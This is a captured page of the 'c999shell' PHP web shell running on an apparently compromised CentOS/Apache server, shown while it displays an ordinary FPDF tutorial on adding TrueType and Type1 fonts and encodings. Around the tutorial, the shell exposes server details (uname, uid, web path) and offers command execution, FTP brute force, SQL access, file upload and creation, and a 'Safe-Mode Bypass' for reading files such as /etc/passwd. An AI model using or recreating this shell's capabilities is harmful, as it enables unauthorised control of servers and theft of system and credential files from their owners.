!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/ums/temp/tutorialTH/   drwxr-xr-x
Free 50.79 GB of 127.8 GB (39.74%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tuto7.htm (15.66 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Adding new fonts and encoding support

Adding new fonts and encoding support

This tutorial explains how to use TrueType or Type1 fonts so that you are not limited to the standard fonts any more. The other interest is that you can choose the font encoding, which allows you to use other languages than the Western ones (the standard fonts having too few available characters).

There are two ways to use a new font: embedding it in the PDF or not. When a font is not embedded, it is sought in the system. The advantage is that the PDF file is lighter; on the other hand, if it is not available, a substitution font is used. So it is preferable to ensure that the needed font is installed on the client systems. If the file is to be viewed by a large audience, it is better to embed.

Adding a new font requires three steps for TrueTypes:
  • Generation of the metric file (.afm)
  • Generation of the font definition file (.php)
  • Declaration of the font in the script
For Type1, the first one is theoretically not necessary because the AFM file is usually shipped with the font. In case you have only a metric file in PFM format, use the convertor available here.

Generation of the metric file

The first step for a TrueType consists in generating the AFM file. A utility exists to do this task: ttf2pt1. The Windows binary is available here. The command line to use is the following:

ttf2pt1 -a font.ttf font

For example, for Comic Sans MS Regular:

ttf2pt1 -a c:\windows\fonts\comic.ttf comic

Two files are created; the one we are interested in is comic.afm.

Generation of the font definition file

The second step consists in generating a PHP file containing all the information needed by FPDF; in addition, the font file is compressed. To do this, a helper script is provided in the font/makefont/ directory of the package: makefont.php. It contains the following function:

MakeFont(string fontfile, string afmfile [, string enc [, array patch [, string type]]])

fontfile
Path to the .ttf or .pfb file.
afmfile
Path to the .afm file.
enc
Name of the encoding to use. Default value: cp1252.
patch
Optional modification of the encoding. Empty by default.
type
Type of the font (TrueType or Type1). Default value: TrueType.

The first parameter is the name of the font file. The extension must be either .ttf or .pfb and determines the font type. If you own a Type1 font in ASCII format (.pfa), you can convert it to binary format with t1utils.
If you don't want to embed the font, pass an empty string. In this case, type is given by the type parameter.
Note: in the case of a font with the same name as a standard one, for instance arial.ttf, it is mandatory to embed. If you don't, Acrobat will use its own font.

The AFM file is the one previously generated.

The encoding defines the association between a code (from 0 to 255) and a character. The first 128 are fixed and correspond to ASCII; the following are variable. The encodings are stored in .map files. Those available are:
  • cp1250 (Central Europe)
  • cp1251 (Cyrillic)
  • cp1252 (Western Europe)
  • cp1253 (Greek)
  • cp1254 (Turkish)
  • cp1255 (Hebrew)
  • cp1257 (Baltic)
  • cp1258 (Vietnamese)
  • cp874 (Thai)
  • ISO-8859-1 (Western Europe)
  • ISO-8859-2 (Central Europe)
  • ISO-8859-4 (Baltic)
  • ISO-8859-5 (Cyrillic)
  • ISO-8859-7 (Greek)
  • ISO-8859-9 (Turkish)
  • ISO-8859-11 (Thai)
  • ISO-8859-15 (Western Europe)
  • ISO-8859-16 (Central Europe)
  • KOI8-R (Russian)
  • KOI8-U (Ukrainian)
Of course, the font must contain the characters corresponding to the chosen encoding.
In the particular case of a symbolic font (that is to say which does not contain letters, such as Symbol or ZapfDingbats), pass an empty string.
The encodings which begin with cp are those used by Windows; Linux systems usually use ISO.
Remark: the standard fonts use cp1252.

The fourth parameter gives the possibility to alter the encoding. Sometimes you may want to add some characters. For instance, ISO-8859-1 does not contain the euro symbol. To add it at position 164, pass array(164=>'Euro').

The last parameter is used to give the type of the font in case it is not embedded (that is to say the first parameter is empty).

After you have called the function (create a new file for this and include makefont.php, or simply add the call directly inside), a .php file is created, with the same name as the .afm one. You may rename it if you wish. If the case of embedding, the font file is compressed and gives a second file with .z as extension (except if the compression function is not available, it requires zlib). You may rename it too, but in this case you have to alter the variable $file in the .php file accordingly.

Example:

MakeFont('c:\\windows\\fonts\\comic.ttf','comic.afm','cp1252');

which gives the files comic.php and comic.z.

Then you have to copy the generated file(s) to the font directory. If the font file could not be compressed, copy the .ttf or .pfb instead of the .z.

Declaration of the font in the script

The last step is the most simple. You just need to call the AddFont() method. For instance:

$pdf->AddFont('Comic','','comic.php');

or simply:

$pdf->AddFont('Comic');

And the font is now available (in regular and underlined styles), usable like the others. If we had worked with Comic Sans MS Bold (comicbd.ttf), we would have put:

$pdf->AddFont('Comic','B','comicbd.php');

Example

Let's now see a small complete example. The font used is Calligrapher, available at www.abstractfonts.com (a site offering numerous free TrueType fonts). The first step is the generation of the AFM file:

ttf2pt1 -a calligra.ttf calligra

which gives calligra.afm (and calligra.t1a that we can delete). Then we generate the definition file:

<?php
require('font/makefont/makefont.php');

MakeFont('calligra.ttf','calligra.afm');
?>

The function call gives the following report:

Warning: character Euro is missing
Warning: character Zcaron is missing
Warning: character zcaron is missing
Warning: character eth is missing
Font file compressed (calligra.z)
Font definition file generated (calligra.php)

The euro character is not present in the font (it is too old). Three other characters are missing too, but we are not interested in them anyway.
We can now copy the two files to the font directory and write the script:

<?php
require('fpdf.php');

$pdf=new FPDF();
$pdf->AddFont('Calligrapher','','calligra.php');
$pdf->AddPage();
$pdf->SetFont('Calligrapher','',35);
$pdf->Cell(0,10,'Enjoy new fonts with FPDF!');
$pdf->Output();
?>

About the euro symbol

The euro character is not present in all encodings, and is not always placed at the same position:

EncodingPosition
cp1250128
cp1251136
cp1252128
cp1253128
cp1254128
cp1255128
cp1257128
cp1258128
cp874128
ISO-8859-1absent
ISO-8859-2absent
ISO-8859-4absent
ISO-8859-5absent
ISO-8859-7absent
ISO-8859-9absent
ISO-8859-11absent
ISO-8859-15164
ISO-8859-16164
KOI8-Rabsent
KOI8-Uabsent

ISO-8859-1 is widespread but does not include the euro sign. If you need it, the simplest thing to do is using cp1252 or ISO-8859-15 instead, which are nearly identical but contain the precious symbol.
As for ISO-8859-2, it is possible to use ISO-8859-16 instead, but it contains many differences. It is therefore simpler to patch the encoding to add the symbol to it, as explained above. The same is true for the other encodings.

Font synthesis under Windows

When a TrueType font is not available in a given style, Windows is able to synthesize it from the regular version. For instance, there is no Comic Sans MS Italic, but it can be built from Comic Sans MS Regular. This feature can be used in a PDF file, but unfortunately requires that the regular font be present in the system (you must not embed it). Here is how to do it:
  • Generate the definition file for the regular font without embedding (you may rename it to reflect the desired style)
  • Open it and append to the variable $name a comma followed by the desired style (Italic, Bold or BoldItalic)
For instance, for the file comici.php:

$name='ComicSansMS,Italic';

It can then be used normally:

$pdf->AddFont('Comic','I','comici.php');

Reducing the size of TrueType fonts

Font files are often quite voluminous (more than 100, even 200KB); this is due to the fact that they contain the characters corresponding to many encodings. zlib compression reduces them but they remain fairly big. A technique exists to reduce them further. It consists in converting the font to the Type1 format with ttf2pt1 by specifying the encoding you are interested in; all other characters will be discarded.
For instance, the arial.ttf font shipped with Windows 98 is 267KB (it contains 1296 characters). After compression it gives 147. Let's convert it to Type1 by keeping only cp1250 characters:

ttf2pt1 -b -L cp1250.map c:\windows\fonts\arial.ttf arial

The .map files are located in the font/makefont/ directory of the package. The command produces arial.pfb and arial.afm. The arial.pfb file is only 35KB, and 30KB after compression.

It is possible to go even further. If you are interested only by a subset of the encoding (you probably don't need all 217 characters), you can open the .map file and remove the lines you are not interested in. This will reduce the file size accordingly.

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0124 ]--